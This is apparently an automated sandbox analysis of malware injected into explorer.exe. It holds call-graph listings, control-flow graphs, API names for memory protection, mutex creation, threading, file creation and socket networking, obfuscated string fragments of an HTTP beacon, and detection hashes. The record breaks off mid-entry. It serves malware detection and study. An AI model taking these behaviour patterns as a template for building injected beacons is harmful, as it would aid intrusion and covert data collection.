fda89f7 13775->13776 13779 fd9d852 13776->13779 13778 fda8a0f 13780 fd9d865 13779->13780 13781 fd9d8e4 13779->13781 13780->13781 13783 fd9d887 13780->13783 13784 fd9d87e 13780->13784 13781->13778 13782 fda336f 13782->13778 13783->13781 13785 fda1662 6 API calls 13783->13785 13784->13782 13787 fda30c2 13784->13787 13785->13781 13788 fda30cb 13787->13788 13790 fda31f0 13787->13790 13789 fda6f82 6 API calls 13788->13789 13788->13790 13789->13790 13790->13782 13899 fd9f2f4 13900 fd9f349 13899->13900 13901 fd9f49f 13900->13901 13903 fd9b8f2 NtProtectVirtualMemory 13900->13903 13902 fd9b8f2 NtProtectVirtualMemory 13901->13902 13906 fd9f4c3 13901->13906 13902->13906 13904 fd9f480 13903->13904 13905 fd9b8f2 NtProtectVirtualMemory 13904->13905 13905->13901 13907 fd9b8f2 NtProtectVirtualMemory 13906->13907 13908 fd9f597 13906->13908 13907->13908 13909 fd9b8f2 NtProtectVirtualMemory 13908->13909 13912 fd9f5bf 13908->13912 13909->13912 13910 fd9f6b9 13911 fd9f6e1 13910->13911 13916 fd9b8f2 NtProtectVirtualMemory 13910->13916 13913 fda2382 ObtainUserAgentString 13911->13913 13912->13910 13914 fd9b8f2 NtProtectVirtualMemory 13912->13914 13915 fd9f6e9 13913->13915 13914->13910 13916->13911 13973 fda222a 13974 fda225e 13973->13974 13975 fda18c2 ObtainUserAgentString 13974->13975 13976 fda226b 13975->13976 13935 fda8aa9 13936 fda8aaf 13935->13936 13939 fda3212 13936->13939 13938 fda8ac7 13940 fda3237 13939->13940 13941 fda321b 13939->13941 13940->13938 13941->13940 13942 fda30c2 6 API calls 13941->13942 13942->13940 13852 fda372e 13853 fda3788 connect 13852->13853 13854 fda376a 13852->13854 13854->13853 13584 fda7bac 13585 fda7bb1 13584->13585 13618 fda7bb6 13585->13618 13619 fd9db72 13585->13619 13587 fda7c2c 13588 fda7c85 13587->13588 13590 fda7c69 13587->13590 13591 fda7c54 13587->13591 13587->13618 13589 fda5ab2 NtProtectVirtualMemory 13588->13589 13592 fda7c8d 13589->13592 13594 fda7c6e 13590->13594 13595 fda7c80 13590->13595 13593 fda5ab2 NtProtectVirtualMemory 13591->13593 13655 fd9f102 13592->13655 13598 fda7c5c 13593->13598 13599 fda5ab2 NtProtectVirtualMemory 13594->13599 13595->13588 13596 fda7c97 13595->13596 13600 fda7cbe 13596->13600 13601 fda7c9c 13596->13601 13641 fd9eee2 13598->13641 13603 fda7c76 13599->13603 13605 fda7cd9 13600->13605 13606 fda7cc7 13600->13606 13600->13618 13623 fda5ab2 13601->13623 13647 fd9efc2 13603->13647 13610 fda5ab2 NtProtectVirtualMemory 13605->13610 13605->13618 13607 fda5ab2 NtProtectVirtualMemory 13606->13607 13609 fda7ccf 13607->13609 13665 fd9f2f2 13609->13665 13613 fda7ce5 13610->13613 13683 fd9f712 13613->13683 13621 fd9db93 13619->13621 13620 fd9dcce 13620->13587 13621->13620 13622 fd9dcb5 CreateMutexW 13621->13622 13622->13620 13625 fda5adf 13623->13625 13624 fda5ebc 13633 fd9ede2 13624->13633 13625->13624 13695 fd9b8f2 13625->13695 13627 fda5e5c 13628 fd9b8f2 NtProtectVirtualMemory 13627->13628 13629 fda5e7c 13628->13629 13630 fd9b8f2 NtProtectVirtualMemory 13629->13630 13631 fda5e9c 13630->13631 13632 fd9b8f2 NtProtectVirtualMemory 13631->13632 13632->13624 13634 fd9edf0 13633->13634 13636 fd9eecd 13634->13636 13720 fda2382 13634->13720 13637 fd9b412 13636->13637 13638 fd9b440 13637->13638 13639 fd9b473 13638->13639 13640 fd9b44d CreateThread 13638->13640 13639->13618 13640->13618 13643 fd9ef06 13641->13643 13642 fd9efa4 13642->13618 13643->13642 13644 fd9b8f2 NtProtectVirtualMemory 13643->13644 13645 fd9ef9c 13644->13645 13646 fda2382 ObtainUserAgentString 13645->13646 13646->13642 13649 fd9f016 13647->13649 13648 fd9f0f0 13648->13618 13649->13648 13652 fd9b8f2 NtProtectVirtualMemory 13649->13652 13653 fd9f0bb 13649->13653 13650 fd9f0e8 13651 fda2382 ObtainUserAgentString 13650->13651 13651->13648 13652->13653 13653->13650 13654 fd9b8f2 NtProtectVirtualMemory 13653->13654 13654->13650 13657 fd9f137 13655->13657 13656 fd9f2d5 13656->13618 13657->13656 13658 fd9b8f2 NtProtectVirtualMemory 13657->13658 13659 fd9f28a 13658->13659 13660 fd9b8f2 NtProtectVirtualMemory 13659->13660 13663 fd9f2a9 13660->13663 13661 fd9f2cd 13662 fda2382 ObtainUserAgentString 13661->13662 13662->13656 13663->13661 13664 fd9b8f2 NtProtectVirtualMemory 13663->13664 13664->13661 13666 fd9f349 13665->13666 13667 fd9f49f 13666->13667 13669 fd9b8f2 NtProtectVirtualMemory 13666->13669 13668 fd9b8f2 NtProtectVirtualMemory 13667->13668 13672 fd9f4c3 13667->13672 13668->13672 13670 fd9f480 13669->13670 13671 fd9b8f2 NtProtectVirtualMemory 13670->13671 13671->13667 13673 fd9b8f2 NtProtectVirtualMemory 13672->13673 13674 fd9f597 13672->13674 13673->13674 13675 fd9b8f2 NtProtectVirtualMemory 13674->13675 13676 fd9f5bf 13674->13676 13675->13676 13679 fd9b8f2 NtProtectVirtualMemory 13676->13679 13680 fd9f6b9 13676->13680 13677 fd9f6e1 13678 fda2382 ObtainUserAgentString 13677->13678 13681 fd9f6e9 13678->13681 13679->13680 13680->13677 13682 fd9b8f2 NtProtectVirtualMemory 13680->13682 13681->13618 13682->13677 13684 fd9f767 13683->13684 13685 fd9b8f2 NtProtectVirtualMemory 13684->13685 13689 fd9f903 13684->13689 13686 fd9f8e3 13685->13686 13687 fd9b8f2 NtProtectVirtualMemory 13686->13687 13687->13689 13688 fd9f9b7 13690 fda2382 ObtainUserAgentString 13688->13690 13691 fd9b8f2 NtProtectVirtualMemory 13689->13691 13692 fd9f992 13689->13692 13693 fd9f9bf 13690->13693 13691->13692 13692->13688 13694 fd9b8f2 NtProtectVirtualMemory 13692->13694 13693->13618 13694->13688 13696 fd9b987 13695->13696 13699 fd9b9b2 13696->13699 13710 fd9c622 13696->13710 13698 fd9bc0c 13698->13627 13699->13698 13700 fd9bba2 13699->13700 13702 fd9bac5 13699->13702 13701 fda7e12 NtProtectVirtualMemory 13700->13701 13709 fd9bb5b 13701->13709 13714 fda7e12 13702->13714 13704 fda7e12 NtProtectVirtualMemory 13704->13698 13705 fd9bae3 13705->13698 13706 fd9bb3d 13705->13706 13707 fda7e12 NtProtectVirtualMemory 13705->13707 13708 fda7e12 NtProtectVirtualMemory 13706->13708 13707->13706 13708->13709 13709->13698 13709->13704 13711 fd9c67a 13710->13711 13712 fd9c684 13711->13712 13713 fda7e12 NtProtectVirtualMemory 13711->13713 13712->13699 13713->13711 13718 fda6942 13714->13718 13716 fda7e45 NtProtectVirtualMemory 13717 fda7e70 13716->13717 13717->13705 13719 fda6967 13718->13719 13719->13716 13721 fda23c7 13720->13721 13724 fda2232 13721->13724 13723 fda2438 13723->13636 13723->13723 13725 fda225e 13724->13725 13728 fda18c2 13725->13728 13727 fda226b 13727->13723 13730 fda1934 13728->13730 13729 fda19a6 13729->13727 13730->13729 13731 fda1995 ObtainUserAgentString 13730->13731 13731->13729 13977 fd9c42e 13978 fd9c45b 13977->13978 13985 fd9c4c9 13977->13985 13979 fda6232 NtCreateFile 13978->13979 13978->13985 13980 fd9c496 13979->13980 13981 fd9c4c5 13980->13981 13983 fd9c082 NtCreateFile 13980->13983 13982 fda6232 NtCreateFile 13981->13982 13981->13985 13982->13985 13984 fd9c4b6 13983->13984 13984->13981 13986 fd9bf52 NtCreateFile 13984->13986 13986->13981 13917 fda0ce2 13919 fda0dd9 13917->13919 13918 fda1022 13919->13918 13920 fda0352 NtCreateFile 13919->13920 13921 fda0f0d 13920->13921 13921->13918 13922 fda0792 NtCreateFile 13921->13922 13922->13921 13923 fda32e4 13924 fda336f 13923->13924 13925 fda3305 13923->13925 13925->13924 13926 fda30c2 6 API calls 13925->13926 13926->13924 13848 fd9db66 13850 fd9db6a 13848->13850 13849 fd9dcce 13850->13849 13851 fd9dcb5 CreateMutexW 13850->13851 13851->13849

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 fda6f82-fda6fb6 1 fda6fb8-fda6fbc 0->1 2 fda6fd6-fda6fd9 0->2 1->2 5 fda6fbe-fda6fc2 1->5 3 fda78fe-fda790c 2->3 4 fda6fdf-fda6fed 2->4 6 fda6ff3-fda6ff7 4->6 7 fda78f6-fda78f7 4->7 5->2 8 fda6fc4-fda6fc8 5->8 9 fda6ff9-fda6ffd 6->9 10 fda6fff-fda7000 6->10 7->3 8->2 11 fda6fca-fda6fce 8->11 9->10 12 fda700a-fda7010 9->12 10->12 11->2 13 fda6fd0-fda6fd4 11->13 14 fda703a-fda7060 12->14 15 fda7012-fda7020 12->15 13->2 13->4 17 fda7068-fda707c call fda35b2 14->17 18 fda7062-fda7066 14->18 15->14 16 fda7022-fda7026 15->16 16->7 19 fda702c-fda7035 16->19 22 fda7081-fda70a2 17->22 18->17 20 fda70a8-fda70ab 18->20 19->7 23 fda70b1-fda70b8 20->23 24 fda7144-fda7150 20->24 22->20 25 fda78ee-fda78ef 22->25 27 fda70ba-fda70dc call fda6942 23->27 28 fda70e2-fda70f5 23->28 24->25 26 fda7156-fda7165 24->26 25->7 31 fda717f-fda718f 26->31 32 fda7167-fda7178 call fda3552 26->32 27->28 28->25 30 fda70fb-fda7101 28->30 30->25 34 fda7107-fda7109 30->34 36 fda7191-fda71ad call fda3732 31->36 37 fda71e5-fda721b 31->37 32->31 34->25 40 fda710f-fda7111 34->40 43 fda71b2-fda71da 36->43 38 fda722d-fda7231 37->38 39 fda721d-fda722b 37->39 45 fda7233-fda7245 38->45 46 fda7247-fda724b 38->46 44 fda727f-fda7280 39->44 40->25 47 fda7117-fda7132 getaddrinfo 40->47 43->37 48 fda71dc-fda71e1 43->48 52 fda7283-fda72e0 call fda7d62 call fda4482 call fda3e72 call fda8002 44->52 45->44 49 fda724d-fda725f 46->49 50 fda7261-fda7265 46->50 47->24 51 fda7134-fda713c 47->51 48->37 49->44 53 fda726d-fda7279 50->53 54 fda7267-fda726b 50->54 51->24 63 fda72e2-fda72e6 52->63 64 fda72f4-fda7354 call fda7d92 52->64 53->44 54->52 54->53 63->64 65 fda72e8-fda72ef call fda4042 63->65 69 fda735a-fda7396 call fda7d62 call fda8262 call fda8002 64->69 70 fda748c-fda74b8 call fda7d62 call fda8262 64->70 65->64 85 fda73bb-fda73e9 call fda8262 * 2 69->85 86 fda7398-fda73b7 call fda8262 call fda8002 69->86 80 fda74ba-fda74d5 70->80 81 fda74d9-fda7590 call fda8262 * 3 call fda8002 * 2 call fda4482 70->81 80->81 110 fda7595-fda75b9 call fda8262 81->110 101 fda73eb-fda7410 call fda8002 call fda8262 85->101 102 fda7415-fda741d 85->102 86->85 101->102 103 fda741f-fda7425 102->103 104 fda7442-fda7448 102->104 107 fda7467-fda7487 call fda8262 103->107 108 fda7427-fda743d 103->108 109 fda744e-fda7456 104->109 104->110 107->110 108->110 109->110 114 fda745c-fda745d 109->114 120 fda75bb-fda75cc call fda8262 call fda8002 110->120 121 fda75d1-fda76ad call fda8262 * 7 call fda8002 call fda7d62 call fda8002 call fda3e72 call fda4042 110->121 114->107 132 fda76af-fda76b3 120->132 121->132 134 fda76ff-fda772d call fda36b2 132->134 135 fda76b5-fda76fa call fda3382 call fda37b2 132->135 145 fda772f-fda7735 134->145 146 fda775d-fda7761 134->146 155 fda78e6-fda78e7 135->155 145->146 149 fda7737-fda774c 145->149 150 fda790d-fda7913 146->150 151 fda7767-fda776b 146->151 149->146 156 fda774e-fda7754 149->156 157 fda7779-fda7784 150->157 158 fda7919-fda7920 150->158 152 fda78aa-fda78df call fda37b2 151->152 153 fda7771-fda7773 151->153 152->155 153->152 153->157 155->25 156->146 163 fda7756 156->163 159 fda7786-fda7793 157->159 160 fda7795-fda7796 157->160 158->159 159->160 164 fda779c-fda77a0 159->164 160->164 163->146 167 fda77a2-fda77af 164->167 168 fda77b1-fda77b2 164->168 167->168 170 fda77b8-fda77c4 167->170 168->170 173 fda77c6-fda77ef call fda7d92 call fda7d62 170->173 174 fda77f4-fda7861 setsockopt recv 170->174 173->174 177 fda78a3-fda78a4 174->177 178 fda7863 174->178 177->152 178->177 181 fda7865-fda786a 178->181 181->177 184 fda786c-fda7872 181->184 184->177 185 fda7874-fda78a1 184->185 185->177 185->178
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: getaddrinforecvsetsockopt
                                                                                              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                              • API String ID: 1564272048-1117930895
                                                                                              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                              • Instruction ID: ffa67f15dc4e734115bbf3830a20efa468b51502de327a6abb9fa0257bbaf4cf
                                                                                              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                              • Instruction Fuzzy Hash: DA527D30614B088FCBA9EF68C4847E9B7E1FB54300F50466EC49BCB146DE75B549CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 299 fda6232-fda6256 300 fda625c-fda6260 299->300 301 fda68bd-fda68cd 299->301 300->301 302 fda6266-fda62a0 300->302 303 fda62bf 302->303 304 fda62a2-fda62a6 302->304 305 fda62c6 303->305 304->303 306 fda62a8-fda62ac 304->306 307 fda62cb-fda62cf 305->307 308 fda62ae-fda62b2 306->308 309 fda62b4-fda62b8 306->309 310 fda62f9-fda630b 307->310 311 fda62d1-fda62f7 call fda6942 307->311 308->305 309->307 312 fda62ba-fda62bd 309->312 316 fda6378 310->316 317 fda630d-fda6332 310->317 311->310 311->316 312->307 318 fda637a-fda63a0 316->318 319 fda63a1-fda63a8 317->319 320 fda6334-fda633b 317->320 321 fda63aa-fda63d3 call fda6942 319->321 322 fda63d5-fda63dc 319->322 323 fda633d-fda6360 call fda6942 320->323 324 fda6366-fda6370 320->324 321->316 321->322 326 fda63de-fda640a call fda6942 322->326 327 fda6410-fda6458 NtCreateFile call fda6172 322->327 323->324 324->316 329 fda6372-fda6373 324->329 326->316 326->327 335 fda645d-fda645f 327->335 329->316 335->316 336 fda6465-fda646d 335->336 336->316 337 fda6473-fda6476 336->337 338 fda6478-fda6481 337->338 339 fda6486-fda648d 337->339 338->318 340 fda648f-fda64b8 call fda6942 339->340 341 fda64c2-fda64ec 339->341 340->316 346 fda64be-fda64bf 340->346 347 fda68ae-fda68b8 341->347 348 fda64f2-fda64f5 341->348 346->341 347->316 349 fda64fb-fda64fe 348->349 350 fda6604-fda6611 348->350 351 fda655e-fda6561 349->351 352 fda6500-fda6507 349->352 350->318 354 fda6616-fda6619 351->354 355 fda6567-fda6572 351->355 356 fda6538-fda6559 352->356 357 fda6509-fda6532 call fda6942 352->357 363 fda66b8-fda66bb 354->363 364 fda661f-fda6626 354->364 360 fda65a3-fda65a6 355->360 361 fda6574-fda659d call fda6942 355->361 359 fda65e9-fda65fa 356->359 357->316 357->356 359->350 360->316 368 fda65ac-fda65b6 360->368 361->316 361->360 369 fda6739-fda673c 363->369 370 fda66bd-fda66c4 363->370 365 fda6628-fda6651 call fda6942 364->365 366 fda6657-fda666b call fda7e92 364->366 365->316 365->366 366->316 387 fda6671-fda66b3 366->387 368->316 377 fda65bc-fda65e6 368->377 374 fda6742-fda6749 369->374 375 fda67c4-fda67c7 369->375 378 fda66c6-fda66ef call fda6942 370->378 379 fda66f5-fda6734 370->379 382 fda677a-fda67bf 374->382 383 fda674b-fda6774 call fda6942 374->383 375->316 384 fda67cd-fda67d4 375->384 377->359 378->347 378->379 394 fda6894-fda68a9 379->394 382->394 383->347 383->382 389 fda67fc-fda6803 384->389 390 fda67d6-fda67f6 call fda6942 384->390 387->318 392 fda682b-fda6835 389->392 393 fda6805-fda6825 call fda6942 389->393 390->389 392->347 399 fda6837-fda683e 392->399 393->392 394->318 399->347 403 fda6840-fda6886 399->403 403->394
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID: `
                                                                                              • API String ID: 823142352-2679148245
                                                                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                              • Instruction ID: f3fd9ae4f05d0a076ccf49b37df9617724b80afb63b6c252214f90aac90915fc
                                                                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                              • Instruction Fuzzy Hash: A6223B70A18F09DFCB99EF28C4986AAB7E1FB58301F44062EE45ED7251DB31E452CB85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 443 fda7e12-fda7e6e call fda6942 NtProtectVirtualMemory 446 fda7e7d-fda7e8f 443->446 447 fda7e70-fda7e7c 443->447
                                                                                              APIs
                                                                                              • NtProtectVirtualMemory.NTDLL ref: 0FDA7E67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2706961497-0
                                                                                              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                              • Instruction ID: 84ee7b730a9d0ada3858a590c2583215c9c82667b6d9a6b5c34f0f432af47b2e
                                                                                              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                              • Instruction Fuzzy Hash: 98019E34628B484F8B88EF6C948412AB7E4FBC9214F000B3EA99AC3250EB65C5414742
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 448 fda7e0a-fda7e38 449 fda7e45-fda7e6e NtProtectVirtualMemory 448->449 450 fda7e40 call fda6942 448->450 451 fda7e7d-fda7e8f 449->451 452 fda7e70-fda7e7c 449->452 450->449
                                                                                              APIs
                                                                                              • NtProtectVirtualMemory.NTDLL ref: 0FDA7E67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2706961497-0
                                                                                              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                              • Instruction ID: d622e0d85cb0b162907e6e4ef602d0251b7ca5e0abac821e09cff4d100c95f5a
                                                                                              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                              • Instruction Fuzzy Hash: CD01A234628B884B8B88EB3C94452A6B3E5FBCE314F000B3EE99AC3241DB25D5024786
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ObtainUserAgentString.URLMON ref: 0FDA19A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: AgentObtainStringUser
                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                              • API String ID: 2681117516-319646191
                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                              • Instruction ID: 7a7667b1a58491f7fd757ddc6328b1e8e2a3c9bb8bb9e63a06025fffbab7b41c
                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                              • Instruction Fuzzy Hash: 2731CE31614B4C8FCB85EFA8C8847EEB7F0FB58204F40022AD85ED7241DE799645CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ObtainUserAgentString.URLMON ref: 0FDA19A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: AgentObtainStringUser
                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                              • API String ID: 2681117516-319646191
                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                              • Instruction ID: 0f372608d8fe8834468eb761ec07c8edb6287870bcb29592027698d3df0a1f37
                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                              • Instruction Fuzzy Hash: 9721CE30A14B4C8ECB85EFA8C8847EDBBB0FF58204F40422AD85AD7241DF799605CB9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 232 fd9db66-fd9db68 233 fd9db6a-fd9db71 232->233 234 fd9db93-fd9dbb8 232->234 236 fd9dbbb-fd9dc22 call fda4612 call fda6942 * 2 233->236 238 fd9db73-fd9db92 233->238 234->236 244 fd9dc28-fd9dc2b 236->244 245 fd9dcdc 236->245 238->234 244->245 246 fd9dc31-fd9dcd3 call fda8da4 call fda8022 call fda83e2 call fda8022 call fda83e2 CreateMutexW 244->246 247 fd9dcde-fd9dcf6 245->247 246->245 261 fd9dcd5-fd9dcda 246->261 261->247
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID: .dll$el32$kern
                                                                                              • API String ID: 1964310414-1222553051
                                                                                              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                              • Instruction ID: 5d8f261ee2a6ee9e6c1943de9b8d86ed7ccf21d69d832a442722a96b58ad1546
                                                                                              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                              • Instruction Fuzzy Hash: 36418B70918A088FCF84EFA8C8987ADB7F1FB58300F44417AC84ADB256DA349945CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID: .dll$el32$kern
                                                                                              • API String ID: 1964310414-1222553051
                                                                                              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                              • Instruction ID: 8829ee501ecfce614073e109cf94e784fe3173d7e8f34accbadd35637cf69f8d
                                                                                              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                              • Instruction Fuzzy Hash: 5C415A70918A088FDB84EFA8C8987EDB7E1FB68300F44416AC84ADB256DE349945CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 289 fda372e-fda3768 290 fda376a-fda3782 call fda6942 289->290 291 fda3788-fda37ab connect 289->291 290->291
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: connect
                                                                                              • String ID: conn$ect
                                                                                              • API String ID: 1959786783-716201944
                                                                                              • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                              • Instruction ID: 549d70b5f2f5f9b3d5f36dee246883629a7fed770fcfb2f87b502318b8bd7a32
                                                                                              • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                              • Instruction Fuzzy Hash: A0015A70618B188FCB84EF1CE088B55B7E0FB58324F1545AEE90DCB226CA75D8818BC2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 294 fda3732-fda3768 295 fda376a-fda3782 call fda6942 294->295 296 fda3788-fda37ab connect 294->296 295->296
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: connect
                                                                                              • String ID: conn$ect
                                                                                              • API String ID: 1959786783-716201944
                                                                                              • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                              • Instruction ID: 8ebe0dd370dc4f037571fac0a82f17093e94010c75ef51550e7716b3e55eecf9
                                                                                              • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                              • Instruction Fuzzy Hash: F4012C70618A1C8FCBC4EF5CE088B55B7E0FB59315F1541AEA80DCB226CA75C9818BC2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 407 fda36b2-fda36e5 408 fda36e7-fda36ff call fda6942 407->408 409 fda3705-fda372d send 407->409 408->409
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: send
                                                                                              • String ID: send
                                                                                              • API String ID: 2809346765-2809346765
                                                                                              • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                              • Instruction ID: d1bcf20b06a235910ccd373219ebb211977623d9953d271f4863932493832a70
                                                                                              • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                              • Instruction Fuzzy Hash: D4011270518A188FDBC4EF1CD048B2577E0EB58314F1545AED85DCB266C671D8818B85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 412 fda35b2-fda35ea 413 fda360a-fda362b socket 412->413 414 fda35ec-fda3604 call fda6942 412->414 414->413
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
